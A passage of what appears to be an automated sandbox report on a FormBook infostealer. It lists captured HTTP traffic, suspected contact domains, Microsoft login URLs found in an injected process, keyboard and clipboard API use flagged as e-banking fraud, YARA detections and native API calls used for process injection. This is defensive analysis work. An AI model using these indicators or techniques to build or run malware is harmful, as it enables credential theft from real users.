20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 08:23:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 08:23:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:24:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9PBmn6f2yqeS%2BsvTTgVgQL2rYBoeKqQMPOVOwhEjr25XGGY%2Fztyhc3EDFexFgLbcJahR4rR8ZhwBnPZYyLM6zcIThXPcNzsGs%2BKXHCiizB9CmU0ZQeXV%2BXzA3VnxdAetxBzz55Hh4R02rmI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90038212fa4743ff-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:24:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXEi%2BBNOwffgRwqqrzGoqtH1eCthPfmuIfMDvdzal4rJX%2BNgbcrX5uJr8p%2B%2BaDRxf72rPGyNCEr%2Bl9m%2BuWrzamg6sumFMfS%2FuR1ibrSb1XUxiT3M3rmaI5B3D3N67QIho%2BNQ7SiNomyHCIk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90038222ed9ff5f8-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1450&min_rtt=1450&rtt_var=725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=120&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:24:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipfv1M5a%2Be6rgFS4E%2FxEjuyIvr0kI%2BDLRBC91Ug8g0AjtxKc1nwsbcwNMyltyAi94FBQwvYgUKB18hBq1dCpORcm7v%2BhHWmF%2FO1ME%2FGXQ9ouEMyg8eFxos%2FeGnmV40Z219TYpXDcMOn3gWM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90038232e84b4304-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2169&min_rtt=2169&rtt_var=1084&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:24:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBe58Vk5G9lE5%2FAcM%2FzrLhMtOFG8zH2bpqpCKLY5rtUYvn8uG9yljdWA5HzotZDmxv6ruKOAlDTfNc7exfOLAEXzk3F29yXzl5VgOnSVYG4Hz%2Bt4LRBqrML8ZYsGaGz1EpiGj2oswvWh8hk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90038242cdc443fb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=472&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0

Source: firefox.exe, 00000009.00000002.2002761848.000000003A464000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://m.yunlekeji.top/
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3324169649.0000000006D1F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.soainsaat.xyz
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3324169649.0000000006D1F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.soainsaat.xyz/vivr/
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.lit
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oau
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: chkdsk.exe, 00000005.00000003.1889517437.000000000A231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.00000000055E0000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.0000000006BC0000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3321444358.0000000008760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.0000000004E06000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.00000000063E6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hostgator.com.br

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A66B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00A66B0C

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A66D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A66D07

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

0_2_00A66B0C

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A52B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00A52B37

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A7F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A7F7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1702544011.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319370482.0000000005630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319323904.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3324169649.0000000006CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3318079583.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703561585.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703177843.0000000002D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319443230.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00A13D19
Source: bIcqeSVPW6.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: bIcqeSVPW6.exe, 00000000.00000000.1468953554.0000000000ABE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_77d2f98b-f
Source: bIcqeSVPW6.exe, 00000000.00000000.1468953554.0000000000ABE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ce48af93-8
Source: bIcqeSVPW6.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a50cb221-5
Source: bIcqeSVPW6.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd3d4d2f-4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004FC7D3 NtClose,	2_2_004FC7D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,	2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,	2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074340 NtSetContextThread,	2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074650 NtSuspendThread,	2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B80 NtQueryInformationFile,	2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BA0 NtEnumerateValueKey,	2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BE0 NtQueryValueKey,	2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BF0 NtAllocateVirtualMemory,	2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AB0 NtWaitForSingleObject,	2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AD0 NtReadFile,	2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AF0 NtWriteFile,	2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F30 NtCreateSection,	2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F60 NtCreateProcessEx,	2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F90 NtProtectVirtualMemory,	2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FA0 NtQuerySection,	2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FB0 NtResumeThread,	2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FE0 NtCreateFile,	2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E30 NtWriteVirtualMemory,	2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E80 NtReadVirtualMemory,	2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,	2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EE0 NtQueueApcThread,	2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D00 NtSetInformationFile,	2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D10 NtMapViewOfSection,	2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D30 NtUnmapViewOfSection,	2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DB0 NtEnumerateKey,	2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DD0 NtDelayExecution,	2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C00 NtQueryInformationProcess,	2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C60 NtCreateKey,	2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CA0 NtQueryInformationToken,	2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CC0 NtQueryVirtualMemory,	2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CF0 NtOpenProcess,	2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073010 NtOpenDirectoryObject,	2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073090 NtSetValueKey,	2_2_03073090
